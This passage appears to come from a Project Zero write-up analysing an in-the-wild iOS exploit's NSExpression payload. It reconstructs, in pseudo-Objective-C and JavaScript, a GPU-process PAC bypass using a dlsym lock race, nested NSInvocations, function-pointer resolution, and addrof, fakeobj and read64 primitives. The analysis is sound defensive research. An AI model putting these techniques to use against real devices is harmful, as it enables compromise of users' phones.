scribble_element=[.1];\n\n...\n\n### Starting up\n\n[Last time I analysed one of these](<https://googleprojectzero.blogspot.com/2022/03/forcedentry-sandbox-escape.html>) I used plutil to dump out a human-readable form of the bplist. The object was small enough that I was then able to reconstruct the serialized object by hand. This wasn't going to work this time:\n\n$ plutil -p bplist_raw | wc -l\n\n58995\n\nHere's a random snipped a few tens of thousands of lines in:\n\n14319 =&gt; {\n\n\"$class\" =&gt;\n\n&lt;CFKeyedArchiverUID 0x600001b32f60 [0x7ff85d4017d0]&gt;\n\n{value = 29}\n\n\"NSConstantValue\" =&gt;\n\n&lt;CFKeyedArchiverUID 0x600001b32f40 [0x7ff85d4017d0]&gt;\n\n{value = 14320}\n\n}\n\n14320 =&gt; 2\n\n14321 =&gt; {\n\n\"$class\" =&gt;\n\n&lt;CFKeyedArchiverUID 0x600001b32fe0 [0x7ff85d4017d0]&gt;\n\n{value = 27}\n\n\"NSArguments\" =&gt;\n\n&lt;CFKeyedArchiverUID 0x600001b32fc0 [0x7ff85d4017d0]&gt;\n\n{value = 14323}\n\n\"NSOperand\" =&gt;\n\n&lt;CFKeyedArchiverUID 0x600001b32fa0 [0x7ff85d4017d0]&gt;\n\n{value = 14319}\n\n\"NSSelectorName\" =&gt;\n\n&lt;CFKeyedArchiverUID 0x600001b32f80 [0x7ff85d4017d0]&gt;\n\n{value = 14322}\n\nThere are a few possible analysis approaches here: I could just deserialize the object using NSKeyedUnarchiver and see what happens (potentially using dtrace to hook interesting places) but I didn't want to just learn what this serialized object does - I want to know how it works.\n\nAnother option would be parsing the output of plutil but I figured this was likely almost as much work as parsing the bplist from scratch so I decided to just write my own bplist and NSArchiver parser and go from there.\n\nThis might seem like overdoing it, but with such a huge object it was likely I was going to need to be in the position to manipulate the object quite a lot to figure out how it actually worked.\n\n### bplist\n\nFortunately, bplist isn't a very complicated serialization format and only takes a hundred or so lines of code to implement. Furthermore, I didn't need to support all the bplist features, just those used in the single serialized object I was investigating.\n\n[This blog post](<https://medium.com/@karaiskc/understanding-apples-binary-property-list-format-281e6da00dbd>) gives a great overview of the format and also links to the [CoreFoundation .c file](<https://opensource.apple.com/source/CF/CF-550/CFBinaryPList.c>) containing a comment defining the format.\n\nA bplist serialized object has 4 sections:\n\n * header\n * objects\n * offsets\n * trailer\n\nThe objects section contains all the serialized objects one after the other. The offsets table contains indexes into the objects section for each object. Compound objects (arrays, sets and dictionaries) can then reference other objects via indexes into the offsets table.\n\nbplist only supports a small number of built-in types:\n\nnull, bool, int, real, date, data, ascii string, unicode string, uid, array, set and dictionary\n\nThe serialized form of each type is pretty straightforward, and explained clearly in this comment in CFBinaryPlist.c:\n\nObject Formats (marker byte followed by additional info in some cases)\n\nnull 0000 0000\n\nbool 0000 1000 // false\n\nbool 0000 1001 // true\n\nfill 0000 1111 // fill byte\n\nint 0001 nnnn ... // # of bytes is 2^nnnn, big-endian bytes\n\nreal 0010 nnnn ... // # of bytes is 2^nnnn, big-endian bytes\n\ndate 0011 0011 ... // 8 byte float follows, big-endian bytes\n\ndata 0100 nnnn [int] ... // nnnn is number of bytes unless 1111 then int count follows, followed by bytes\n\nstring 0101 nnnn [int] ... // ASCII string, nnnn is # of chars, else 1111 then int count, then bytes\n\nstring 0110 nnnn [int] ... // Unicode string, nnnn is # of chars, else 1111 then int count, then big-endian 2-byte uint16_t\n\n0111 xxxx // unused\n\nuid 1000 nnnn ... // nnnn+1 is # of bytes\n\n1001 xxxx // unused\n\narray 1010 nnnn [int] objref* // nnnn is count, unless '1111', then int count follows\n\n1011 xxxx // unused\n\nset 1100 nnnn [int] objref* // nnnn is count, unless '1111', then int count follows\n\ndict 1101 nnnn [int] keyref* objref* // nnnn is count, unless '1111', then int count follows\n\n1110 xxxx // unused\n\n1111 xxxx // unused\n\nIt's a Type-Length-Value encoding with the type field in the upper nibble of the first byte. There's some subtlety to decoding the variable sizes correctly, but it's all explained fairly well in the CF code. The keyref* and objref* are indexes into the eventual array of deserialized objects; the bplist header defines the size of these references (so a small object with up to 256 objects could use a single byte as a reference.)\n\nParsing the bplist and printing it ends up with an object with this format:\n\ndict {\n\nascii(\"$top\"):\n\ndict {\n\nascii(\"root\"):\n\nuid(0x1)\n\n}\n\nascii(\"$version\"):\n\nint(0x186a0)\n\nascii(\"$objects\"):\n\narray [\n\n[+0]:\n\nascii(\"$null\")\n\n[+1]:\n\ndict {\n\nascii(\"NS.relative\"):\n\nuid(0x3)\n\nascii(\"WK.baseURL\"):\n\nuid(0x3)\n\nascii(\"$0\"):\n\nint(0xe)\n\nascii(\"$class\"):\n\nuid(0x2)\n\n}\n\n[+2]:\n\ndict {\n\nascii(\"$classes\"):\n\narray [\n\n[+0]:\n\nascii(\"WKSecureCodingURLWrapper\")\n\n[+1]:\n\nascii(\"NSURL\")\n\n[+2]:\n\nascii(\"NSObject\")\n\n]\n\nascii(\"$classname\"):\n\nascii(\"WKSecureCodingURLWrapper\")\n\n}\n\n...\n\nThe top level object in this bplist is a dictionary with three entries:\n\n$version: int(100000)\n\n$top: uid(1)\n\n$objects: an array of dictionaries\n\nThis is the top-level format for an NSKeyedArchiver. Indirection in NSKeyedArchivers is done using the uid type, where the values are integer indexes into the $objects array. (Note that this is an extra layer of indirection, on top of the keyref/objref indirection used at the bplist layer.)\n\nThe $top dictionary has a single key \"root\" with value uid(1) indicating that the object serialized by the NSKeyedArchiver is encoded as the second entry in the $objects array.\n\nEach object encoded within the NSKeyedArchiver effectively consists of two dictionaries:\n\none defining its properties and one defining its class. Tidying up the sample above (since dictionary keys are all ascii strings) the properties dictionary for the first object looks like this:\n\n{\n\nNS.relative : uid(0x3)\n\nWK.baseURL : uid(0x3)\n\n$0 : int(0xe)\n\n$class : uid(0x2)\n\n}\n\nThe $class key tells us the type of object which is serialized. Its value is uid(2) which means we need to go back to the objects array and find the dictionary at that index:\n\n{\n\n$classname : \"WKSecureCodingURLWrapper\"\n\n$classes : [\"WKSecureCodingURLWrapper\",\n\n\"NSURL\",\n\n\"NSObject\"]\n\n}\n\nNote that in addition to telling us the final class (WKSecureCodingURLWrapper) it also defines the inheritance hierarchy. The entire serialized object consists of a fairly enormous graph of these two types of dictionaries defining properties and types.\n\nIt shouldn't be a surprise to see WKSecureCodingURLWrapper here; we saw it right at the end of the first section.\n\n### Finding the beginning\n\nSince we have a custom parser we can start dumping out subsections of the object graph looking for the NSExpressions. In the end we can follow these properties to find an array of PTSection objects, each of which contains multiple PTRow objects, each with an associated condition in the form of an NSComparisonPredicate:\n\nsections = follow(root_obj, ['NS.relative', 'NS.relative', 'NS.configDict', 'NS.skkeyset', 'components', 'NS.objects'])\n\nEach of those PTRows contains a single predicate to evaluate - in the end the relevant parts of the payload are contained entirely in four NSExpressions.\n\n### Types\n\nThere are only a handful of primitive NSExpression family objects from which the graph is built:\n\nNSComparisonPredicate\n\nNSLeftExpression\n\nNSRightExpression\n\nNSPredicateOperator\n\nEvaluate the left and right side then return the result of comparing them with the given operator.\n\nNSFunctionExpression\n\nNSSelectorName\n\nNSArguments\n\nNSOperand\n\nSend the provided selector to the operand object passing the provided arguments, returning the return value\n\nNSConstantValueExpression\n\nNSConstantValueClassName\n\nNSConstantValue\n\nA constant value or Class object\n\nNSVariableAssignmentExpression\n\nNSAssignmentVariable\n\nNSSubexpression\n\nEvaluate the NSSubexpression and assign its value to the named variable\n\nNSVariableExpression\n\nNSVariable\n\nReturn the value of the named variable\n\nNSCustomPredicateOperator\n\nNSSelectorName\n\nThe name of a selector in invoke as a comparison operator\n\nNSTernaryExpression\n\nNSPredicate\n\nNSTrueExpression\n\nNSFalseExpression\n\nEvaluate the predicate then evaluate either the true or false branch depending on the value of the predicate.\n\n### E2BIG\n\nThe problem is that the object graph is simply enormous with very deep nesting. Attempts to perform simple transforms of the graph to a text representation quickly became incomprehensible with over 40 layers of nesting.\n\nIt's very unlikely that whoever crafted this serialized object actually wrote the entire payload as a single expression. Much more likely is that they used some tricks and tooling to turn a sequential series of operations into a single statement. But to figure those out we still need a better way to see what's going on.\n\n### Going DOTty\n\nThis object is a graph - so rather than trying to immediately transform it to text why not try to visualize it as a graph instead?\n\n[DOT](<https://graphviz.org/doc/info/lang.html>) is the graph description language used by [graphviz](<https://graphviz.org/>) \\- an open-source graph drawing package. It's pretty simple:\n\ndigraph {\n\nA -&gt; B\n\nB -&gt; C\n\nC -&gt; A\n\n}\n\n| \n\n[](<https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhW_b7V-TsK6Oqr5OSPWT5-hZ5f_8pCrQjOEMVEjnZ1kD1RcrOuxZIcOzSXm-62KfzFotuExCGr2JmFyILYa9cW3OnG4HRBHr0CCC2y4jRcEEr6a_jDns_Bil4DDQpsZThUDilWcajsjKbh_eppltiSH0tnz-8ms907uDCsI7jAliAF6p2aehlhQPGmEEc/s1600/image11.png>) \n \n---|--- \n \nYou can also define nodes and edges separately and apply properties to them:\n\ndigraph {\n\nA [shape=square]\n\nB [label=\"foo\"]\n\nA -&gt; B\n\nB -&gt; C\n\nC -&gt; A [style=dotted]\n\n}\n\n| \n\n[](<https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgkJnjUKZ5OTep-zxMFYt4YG83L42A-SHhXtVqHQIAxuRhZ2VGCw6cRCHPerUUyTumT1ku6GvCXWIBv_2Zvq8qx_WdHCUsm2TC4bPQ2PIlNcHqJc8C4a-g5iQ7MER2l7N7qjlFdVeYxP_6ul4T3K-4HuChHKuCGsnD-rKQMTyJNUwsC04v9-2x2_O7slFU/s1600/image6.png>) \n \n---|--- \n \nWith the custom parser it's relatively easy to emit a dot representation of the entire NSExpression graph. But when it comes time to actually render it, progress is rather slow...\n\nAfter leaving it overnight without success it seemed that perhaps a different approach again is required. Graphviz is certainly capable of rendering a graph with tens of thousands of nodes; the part which is likely failing is graphviz's attempts to layout the nodes in a clean way.\n\n### Medium data\n\nMaybe some of the tools explicitly designed for interactively exploring significant datasets could help here. I chose to use [Gephi](<https://gephi.org/>), an open-source graph visualization platform.\n\nI loaded the .dot file into Gephi and waited for the magic:\n\n[](<https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh5qT7qy0QbyqqVploNg4LelSnmX9dKZN52iWGEv1Qz4nuDOYnir2beUFJmT4rilB_LsctjwiFQu595S9UYlGPbk3YCMYJEPomUyHJdbicSBg3w8kw_iF6r8-GMpCBxvbmE3uZPbnWMUoQKLniJzpaj31PWV9S5FZWhtVntdjuh68fLW90Fs2lEgs_4gVM/s1600/image16.png>)\n\nThis might take some more work.\n\n### Directing forces\n\nThe default layout seems to just position all the nodes equally in a square - not particularly useful. But using the layout menu on the left we can choose layouts which might give us some insight. Here's a force-directed layout, which emphasizes highly-connected nodes:\n\n[](<https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEha6DeZ1nYghaKEsUPjE1hwvAgrcxVdsLq9M9if7k45GVZGHNiVNn2LmJYzbebEaIEn3rTMKG8kXizodrwT3AU6OxwdTPnX0T56Q2NKZCtxdVJYSK7fWmF_W6dUySsZZ45hEA8pGG0bJGtvzOW1I9DpYx2Aa9mAGq0aG7NuMLXTbdtBDOZ8_MoZgvXN2Yw/s1600/image9.png>)\n\nMuch better! I then started to investigate which nodes have large in or out degrees and figure out why. For example here we can see that a node with the label func:alloc has a huge in-degree.\n\n[](<https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiyyOoxrXmQdMZz-qFcUgmo76hHEwghN4Z5kzB_V3gf-tXsC2S8ZYFqLd1VcDuo5rM1h1eQ_f0jdzepAGKta-fc-vqmOFK1Y_E9lFQHjyvxrscPI9zZyJG5VWXBlOQ-fKpcUITbXZGH99Fas8g77dasgQmSgxtEswJEF2_IwZB5JNsO-mZywfbDsAzTOYs/s1600/image8.png>)\n\nTrying to layout the graph with nodes which such high indegrees just leads to a mess (and was potentially what was slowing the graphviz tools down so much) so I started adding hacks to the custom parser to duplicate certain nodes while maintaining the semantics of the expression in order to minimize the number of crossing edges in the graph.\n\nDuring this iterative process I ended up creating the graph shown at the start of this writeup, when only a handful of high in-degree nodes remained and the rest separated cleanly into clusters:\n\n[](<https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjrzpTZ2_H16_OJgFkwuJNmL120zmxWCcdrLlPXp-6x5SsweX8PosbAcKI9Sf8Ad0bYlMfDGwJ0Rz5GdwwEVnek-taAR1voRObiCwl7StIIx2gIHw7zH16AOi-TJRNiyDYKXprNRQNmt6vosLtafQdbjrRgTJB7HLUt_qc1sfCG_sAWZk_wfsfaei3c2-4/s1600/image7.png>)\n\n### Flattening\n\nAlthough this created a large number of extra nodes in the graph it turns out that this has made things much easier for graphviz to layout. It still can't do the whole graph, but we can now split it into chunks which successfully render to very large SVGs. The advantage of switching back to graphviz is that we can render arbitrary information with custom node and edge labels. For example using custom shape primitives to make the arrays of NSFunctionExpression arguments stand out more clearly:\n\n[](<https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhxSkoNTMqfudlBmWGUwZwiohNCIu8xpvOdBmB-hIRXLf7vSddvP0Ay6M8AfPZQNME_UzZHDSbE5Dofvlaap7gy3DdBTseXL7Dml-YW2wv9wBa3vjJ6Jt4_DtUNcTxV0AlG4QZBfgx4_1I6sDEa00vO-qPh-yPR8w1DRjnaGJEMMn4YeAvvGy6ul6fFXNE/s1566/image5.png>)\n\nHere we can see nested related function calls, where the intention is clearly to pass the return value from one call as the argument to another. Starting in the bottom right of the graph shown above we can work backwards (towards the top left) to reconstruct pseudo-objective-c:\n\n[writeInvocationName\n\ngetArgument:\n\n[ [_NSPredicateUtils\n\nbitwiseOr: [NSNumber numberWithUnsignedLongLong:\n\n[intermediateAddress: bytes]]\n\nwith: @0x8000000000000000]] longLongValue ]\n\natIndex: [@0x1 longLongValue] ]\n\nWe can also now clearly see the trick they use to execute multiple unrelated statements:\n\n[](<https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEipo1_BJVDoZY-HkSmQBs2EehlcTnWvTalheSR74itlEnLnW3OzGzx4Gk3AoFjVM1moihApNadCoaQzJXXCzAmvuXWCEMIAN210z1eu5wh50lHGBszL_UWIHchQ9mj7gXyDFVr9Y4Fk0TYtdv2YoT-cFqWK-BjL7S2lMzN4bVxi6KsFXX1PB3tw0BSfMS0/s1276/image10.png>)\n\nMultiple unrelated expressions are evaluated sequentially by passing them as arguments to an NSFunctionExpression calling [NSNull alloc]. This is a method which takes no arguments and has no side-effects (the NSNull is a singleton and alloc returns a global pointer) but the NSFunctionExpression evaluation will still evaluate all the provided arguments then discard them.\n\nThey build a huge tree of these [NSNull alloc] nodes which allows them to sequentially execute unrelated expressions.\n\n[](<https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhy38GVNF5THf65qjWhTjOlzJixu9MiOpzLQ7I8vkZx93U2__h8ympN_kXbtAGx8Rm8438yTPzDjZjBNlTNLAoCThHD6FF7pbE3f5xDpMNOEjAsZQlLOey6chJ2oJn1rmsDD7IJjpInA9p-SlB_Y5P-qlN6Emh8DA2NkdPbxKWWn8TU4ceqOa7LLV95wyg/s1600/image2.png>)\n\n### Connecting the dots\n\nSince the return values of the evaluated arguments are discarded they use NSVariableExpressions to connect the statements semantically. These are a wrapper around an NSDictionary object which can be used to store named values. Using the custom parser we can see there are 218 different named variables. Interestingly, whilst Mach-O is stripped and all symbols were removed, that's not the case for the NSVariables - we can see their full (presumably original) names.\n\n### bplist_to_objc\n\nHaving figured out the NSNull trick they use for sequential expression evaluation it's now possible to flatten the graph to pseudo-objective-c code, splitting each argument to an [NSNull alloc] NSFunctionExpression into separate statements:\n\nid v_detachNewThreadWithBlock:_NSFunctionExpression = [NSNumber numberWithUnsignedLongLong:[[[NSFunctionExpression alloc] initWithTarget:@\"target\" selectorName:@\"detachNewThreadWithBlock:\" arguments:@[] ] selector] ];\n\nThis is getting closer to a decompiler-type output. It's still a bit jumbled, but significantly more readable than the graph and can be refactored in a code editor.\n\n### Helping out\n\nThe expressions make use of NSPredicateUtilities for arithmetic and bitwise operations. Since we don't have to support arbitrary input, we can just hardcode the selectors which implement those operations and emit a more readable helper function call instead:\n\nif selector_str == 'bitwiseOr:with:':\n\narg_vals = follow(o, ['NSArguments', 'NS.objects'])\n\ns += 'set_msb(%s)' % parse_expression(arg_vals[0], depth+1)\n\nelif selector_str == 'add:to:':\n\narg_vals = follow(o, ['NSArguments', 'NS.objects'])\n\ns += 'add(%s, %s)' % (parse_expression(arg_vals[0], depth+1), parse_expression(arg_vals[1], depth+1))\n\nThis yields arithmetic statements which look like this:\n\n[v_dlsym_lock_ptrinvocation setArgument:[set_msb(add(v_OOO_dyld_dyld, @0xa0)) longLongValue] atIndex:[@0x2 longLongValue] ];\n\n### but...why?\n\nAfter all that we're left with around 1000 lines of sort-of readable pseudo-objective-C. There are a number of further tricks they use to implement things like arbitrary read and write which I manually replaced with simple assignment statements.\n\nThe attackers are already in a very strong position at this point; they can evaluate arbitrary NSExpressions, with the security bits disabled such that they can still allocate and interact with arbitrary classes. But in this case the attackers are determined to be able to call arbitrary functions, without being restricted to just Objective-C selector invocations.\n\nThe major barrier to doing this easily is PAC (pointer authentication.) The B-family PAC keys used for backwards-edge protection (e.g. return addresses on the stack) were always per-process but the A-family keys (used for forward-edge protection for things like function pointers) used to be shared across all userspace processes, meaning userspace tasks could forge signed forward-edge PAC'ed pointers which would be valid in other tasks.\n\nWith some low-level changes to the virtual memory code it's now possible for tasks to use private, isolated A-family keys as well, which means that the WebContent process can't necessarily forge forward-edge keys for other tasks (like the GPU Process.)\n\nMost previous userspace PAC defeats were finding a way where a forged forward-edge function pointer could be used across a privilege boundary - and when forward-edge keys were shared there were a great number of such primitives. Kernel PAC defeats tended to be slightly more involved, often targeting race-conditions to create signing oracles or similar primitives. We'll see that the attackers took inspiration from those kernel-PAC defeats here...\n\n### Invoking Invocations with IMPs\n\nAn [NSInvocation](<https://developer.apple.com/documentation/foundation/nsinvocation>), as the name suggests, wraps up an Objective-C method call such that it can be called at a later point. Although conceptually in Objective-C you don't \"call methods\" but instead \"pass messages to objects\" in reality of course you do end up eventually at a branch instruction to the native code which implements the selector for the target object. It's also possible to cache the address of this native code as an IMP object (it's really just a function pointer.)\n\nAs outlined in the [see-no-eval NSExpression blogpost](<https://codecolor.ist/2021/01/16/see-no-eval-runtime-code-execution-objc/>) NSInvocations can be used to get instruction pointer control from NSExpressions - with the caveat that you must provide a signed PC value. The first method they call using this primitive is the implementation of [CFPrefsSource lock]\n\n; void __cdecl -[CFPrefsSource lock](CFPrefsSource *self, SEL)\n\nADD X0, X0, #0x34\n\nB _os_unfair_lock_loc\n\nThey get a signed (with PACIZA) IMP for this function by calling\n\nid os_unfair_lock_0x34_IMP = [[CFPrefsSource alloc] methodForSelector: sel(lock)]\n\nTo call that function they use two nested NSInvocations:\n\nid invocationInner = [templateInvocation copy];\n\n[invocationInner setTarget:(dlsym_lock_ptr - 0x34)]\n\n[invocationInner setSelector: [@0x43434343 longLongValue]]\n\nid invocationOuter = [templateInvocation copy];\n\n[invocationOuter setSelector: sel(invokeUsingIMP)];\n\n[invocationOuter setArgument: os_unfair_lock_loc_IMP\n\natIndex: @2];\n\nThey then call invoke on the outer invocation, which invokes the inner invocation via invokeUsingIMP: which allows the [CFPrefsSource lock] function implementation to be called on something which most certainly isn't a CFPrefsSource object (as the invokeWithIMP bypasses the regular Objective-C selector-to-IMP lookup process.)\n\n### Lock what?\n\nBut what is that lock, and why are they locking it? That lock is used here inside dlsym:\n\n// dlsym() assumes symbolName passed in is same as in C source code\n\n// dyld assumes all symbol names have an underscore prefix\n\nBLOCK_ACCCESSIBLE_ARRAY(char, underscoredName, strlen(symbolName) + 2);\n\nunderscoredName[0] = '_';\n\nstrcpy(&amp;underscoredName[1], symbolName);\n\n__block Diagnostics diag;\n\n__block Loader::ResolvedSymbol result;\n\nif ( handle == RTLD_DEFAULT ) {\n\n// magic \"search all in load order\" handle\n\n__block bool found = false;\n\nwithLoadersReadLock(^{\n\nfor ( const dyld4::Loader* image : loaded ) {\n\nif ( !image-&gt;hiddenFromFlat() &amp;&amp; image-&gt;hasExportedSymbol(diag, *this, underscoredName, Loader::shallow, &amp;result) ) {\n\nfound = true;\n\nbreak;\n\n}\n\n}\n\n});\n\nwithLoadersReadLock first takes the global lock which the invocation locked before evaluating the block which resolves the symbol:\n\nthis-&gt;libSystemHelpers-&gt;os_unfair_recursive_lock_lock_with_options(\n\n&amp;(_locks.loadersLock),\n\nOS_UNFAIR_LOCK_NONE);\n\nwork();\n\nthis-&gt;libSystemHelpers-&gt;os_unfair_recursive_lock_unlock(\n\n&amp;_locks.loadersLock);\n\nSo by taking this lock the NSExpression has ensured that any calls to dlsym in the GPU process will block waiting for this lock.\n\n### Threading the needle\n\nNext they use the same double-invocation trick to make the following Objective-C call:\n\n[NSThread detachNewThreadWithBlock:aBlock]\n\npassing as the block argument a pointer to a block inside the CoreGraphics library with the following body:\n\nvoid *__CGImageCreateWithPNGDataProvider_block_invoke_2()\n\n{\n\nvoid *sym;\n\nif ( CGLibraryLoadImageIODYLD_once != -1 ) {\n\ndispatch_once(&amp;CGLibraryLoadImageIODYLD_once,\n\n&amp;__block_literal_global_5_15015);\n\n}\n\nif ( !CGLibraryLoadImageIODYLD_handle ) {\n\n// fail\n\n}\n\nsym = dlsym(CGLibraryLoadImageIODYLD_handle,\n\n\"CGImageSourceGetType\");\n\nif ( !sym ) {\n\n// fail\n\n}\n\nCGImageCreateWithPNGDataProvider = sym;\n\nreturn sym;\n\n}\n\nPrior to starting the thread calling that block they also perform two arbitrary writes to set:\n\nCGLibraryLoadImageIODYLD_once = -1\n\nand \n\nCGLibraryLoadImageIODYLD.handle = RTLD_DEFAULT\n\nThis means that the thread running that block will reach the call to:\n\ndlsym(CGLibraryLoadImageIODYLD_handle,\n\n\"CGImageSourceGetType\");\n\nthen block inside the implementation of dlsym waiting to take a lock held by the NSExpression.\n\n### Sleep and repeat\n\nThey call [NSThread sleepForTimeInterval] to sleep on the NSExpression thread to ensure that the victim dlsym thread has started, then read the value of libpthread::___pthread_head, the start of a linked-list of pthreads representing all the running threads (the address of which was linked and rebased by the JS.)\n\nThey then use an unrolled loop of 100 NSTernaryExpressions to walk that linked list looking for the last entry (which has a null pthread.next field) which is the most recently-started thread.\n\nThey use a hardcoded offset into the pthread struct to find the thread's stack and create an NSData object wrapping the first page of the dlsym thread's stack:\n\nid v_stackData = [NSData dataWithBytesNoCopy:[set_msb(v_stackEnd) longLongValue] length:[@0x4000 longLongValue] freeWhenDone:[@0x0 longLongValue] ];\n\nRecall this code we saw earlier in the dlsym snippet:\n\n// dlsym() assumes symbolName passed in is same as in C source code\n\n// dyld assumes all symbol names have an underscore prefix\n\nBLOCK_ACCCESSIBLE_ARRAY(char, underscoredName, strlen(symbolName) + 2);\n\nunderscoredName[0] = '_';\n\nstrcpy(&amp;underscoredName[1], symbolName);\n\nBLOCK_ACCESSIBLE_ARRAY is really creating an alloca-style local stack buffer in order to prepend an underscore to the symbol name, which explains why the NSExpression code does this next:\n\n[v_stackData rangeOfData:@\"b'_CGImageSourceGetType'\" options:[@0x0 longLongValue] range:[@0x0 longLongValue] [@0x4000 longLongValue] ]\n\nThis returns an NSRange object defining where the string \"_CGImageSourceGetType\" appears in that page of the stack. \"CGImageSourceGetType\" (without the underscore) is the hardcoded (and constant, in read-only memory) string which the block passes to dlsym.\n\nThe NSExpression then calculates the absolute address of that string on the thread stack and uses [NSData getBytes:length:] to write the contents of an NSData object containing the string \"_dlsym\\0\\0\" over the start of the \"_CGImageSourceGetType\" string on the blocked dlsym thread.\n\n### Unlock and go\n\nUsing the same tricks as before to lock the lock (but this time using the IMP of [CFPrefsSource unlock] they unlock the global lock blocking the dlsym thread. This causes the block to continue executing and dlsym to complete, now returning a PACIZA-signed function pointer to dlsym instead of CGImageSourceGetType.\n\nThe block then assigns the return value of that call to dlsym to a global variable:\n\nCGImageCreateWithPNGDataProvider = sym;\n\nThe NSExpression calls sleepForTimeInterval again to ensure that the block has completed, then reads that global variable to get a signed function pointer to dlsym!\n\n(It's worth noting that it used to be the case, as documented by Samuel Gro\u00df in his [iMessage remote exploit writeup](<https://googleprojectzero.blogspot.com/2020/01/remote-iphone-exploitation-part-3.html>), that there were Objective-C methods such as [CNFileServices dlsym:] which would directly give you the ability to call dlsym and get PACIZA-signed function pointers.)\n\n### Do look up\n\nArmed with a signed dlsym pointer they use the nested invocation trick to call dlsym 22 times to get 22 more signed function pointers, assigning them to numbered variables:\n\n#define f_def(v_index, sym) \\\\\\\n\nid v_symInvocation = [v_templateInvocation copy];\n\n[v_#sym#Invocation setTarget:[@0xfffffffffffffffe longLongValue] ];\n\n[v_#sym#Invocation setSelector:[@\"sym\" UTF8String] ];\n\nid v_#sym#InvocationIMP = [v_templateInvocation copy];\n\n[v_#sym#InvocationIMP setSelector:[v_invokeUsingIMP:_NSFunctionExpression longLongValue] ];\n\n[v_writeInvocationName setSelector:[v_dlsymPtr longLongValue] ];\n\n[v_writeInvocationName getArgument:[set_msb([NSNumber numberWithUnsignedLongLong:[v_intermidiateAddress bytes] ]) longLongValue] atIndex:[@0x1 longLongValue] ];\n\n[v_#sym#InvocationIMP setArgument:[set_msb([NSNumber numberWithUnsignedLongLong:[v_intermidiateAddress bytes] ]) longLongValue] atIndex:[@0x2 longLongValue] ];\n\n[v_#sym#InvocationIMP setTarget:v_symInvocation ];\n\n[v_#sym#InvocationIMP invoke];\n\nid v_#sym#____converted = [NSNumber numberWithUnsignedLongLong:[@0xaaaaaaaaaaaaaaa longLongValue] ];\n\n[v_#sym#Invocation getReturnValue:[set_msb(add([NSNumber numberWithUnsignedLongLong:v_#sym#____converted ], @0x10)) longLongValue] ];\n\nid v_#sym# = v_#sym#____converted;\n\nid v_#index = v_#sym;\n\n}\n\nf_def(0, syscall)\n\nf_def(1, task_self_trap)\n\nf_def(2, task_get_special_port)\n\nf_def(3, mach_port_allocate)\n\nf_def(4, sleep)\n\nf_def(5, mach_absolute_time)\n\nf_def(6, mach_msg)\n\nf_def(7, mach_msg2_trap)\n\nf_def(8, mach_msg_send)\n\nf_def(9, mach_msg_receive)\n\nf_def(10, mach_make_memory_entry)\n\nf_def(11, mach_port_type)\n\nf_def(12, IOMainPort)\n\nf_def(13, IOServiceMatching)\n\nf_def(14, IOServiceGetMatchingService)\n\nf_def(15, IOServiceOpen)\n\nf_def(16, IOConnectCallMethod)\n\nf_def(17, open)\n\nf_def(18, sprintf)\n\nf_def(19, printf)\n\nf_def(20, OSSpinLockLock)\n\nf_def(21, objc_msgSend)\n\n### Another path\n\nStill not satisfied with the ability to call arbitrary (exported, named) functions from NSExpressions the exploit now takes yet another turn and comes, in a certain sense, full circle by creating a JSContext object to evaluate javascript code embedded in a string inside the NSExpression:\n\nid v_JSContext = [[JSContext alloc] init];\n\n[v_JSContext evaluateScript:@\"function hex(b){return(\\\"0\\\"+b.toString(16)).substr(-2)}function hexlify(bytes){var res=[];for(var i=0...\" ];\n\n...\n\nThe exploit evaluates three separate scripts inside this same context:\n\n### JS 1\n\nThe first script defines a large set of utility types and functions common to many JS engine exploits. For example it defines a Struct type:\n\nconst Struct = function() {\n\nvar buffer = new ArrayBuffer(8);\n\nvar byteView = new Uint8Array(buffer);\n\nvar uint32View = new Uint32Array(buffer);\n\nvar float64View = new Float64Array(buffer);\n\nreturn {\n\npack: function(type, value) {\n\nvar view = type;\n\nview[0] = value;\n\nreturn new Uint8Array(buffer, 0, type.BYTES_PER_ELEMENT)\n\n},\n\nunpack: function(type, bytes) {\n\nif (bytes.length !== type.BYTES_PER_ELEMENT) throw Error(\"Invalid bytearray\");\n\nvar view = type;\n\nbyteView.set(bytes);\n\nreturn view[0]\n\n},\n\nint8: byteView,\n\nint32: uint32View,\n\nfloat64: float64View\n\n}\n\n}();\n\nThe majority of the code is defining a custom fully-featured Int64 type.\n\nAt the end they define two [very useful helper functions](<http://www.phrack.org/issues/70/3.html#article>):\n\nfunction addrof(obj) {\n\naddrof_obj_ary[0] = obj;\n\nvar addr = Int64.fromDouble(addrof_float_ary[0]);\n\naddrof_obj_ary[0] = null;\n\nreturn addr\n\n}\n\nfunction fakeobj(addr) {\n\naddrof_float_ary[0] = addr.asDouble();\n\nvar fake = addrof_obj_ary[0];\n\naddrof_obj_ary[0] = null;\n\nreturn fake\n\n}\n\nas well as a read64() primitive:\n\nfunction read64(addr) {\n\nread64_float_ary[0] = addr.asDouble();\n\nvar tmp = \"\";\n\nfor (var it = 0; it &lt; 4; it++) {\n\ntmp = (\"000\" + read64_str.charCodeAt(it).toString(16)).slice(-4) + tmp\n\n}\n\nvar ret = new Int64(\"0x\" + tmp);\n\nreturn ret\n\n}\n\nOf course, these primitives don't actually work - they are the standard primitives which would usually be built from a JS engine vulnerability like a JIT compiler bug, but there's no vulnerability being exploited here. Instead, after this script has been evaluated the NSExpression uses the [JSContext objectForKeyedSubscript] method to look up the global objects used by those primitives and directly corrupt the underlying objects like the arrays used by addrof and fakeobj such that they work.\n\nThis sets the stage for the second of the three scripts to run:\n\n### JS 2\n\nJS2 uses the corrupted addrof_* arrays to build a write64 primitive then declares the following dictionary:\n\nvar all_function = {\n\nsyscall: 0n,\n\nmach_task_self: 1n,\n\ntask_get_special_port: 2n,\n\nmach_port_allocate: 3n,\n\nsleep: 4n,\n\nmach_absolute_time: 5n,\n\nmach_msg: 6n,\n\nmach_msg2_trap: 7n,\n\nmach_msg_send: 8n,\n\nmach_msg_receive: 9n,\n\nmach_make_memory_entry: 10n,\n\nmach_port_type: 11n,\n\nIOMainPort: 12n,\n\nIOServiceMatching: 13n,\n\nIOServiceGetMatchingService: 14n,\n\nIOServiceOpen: 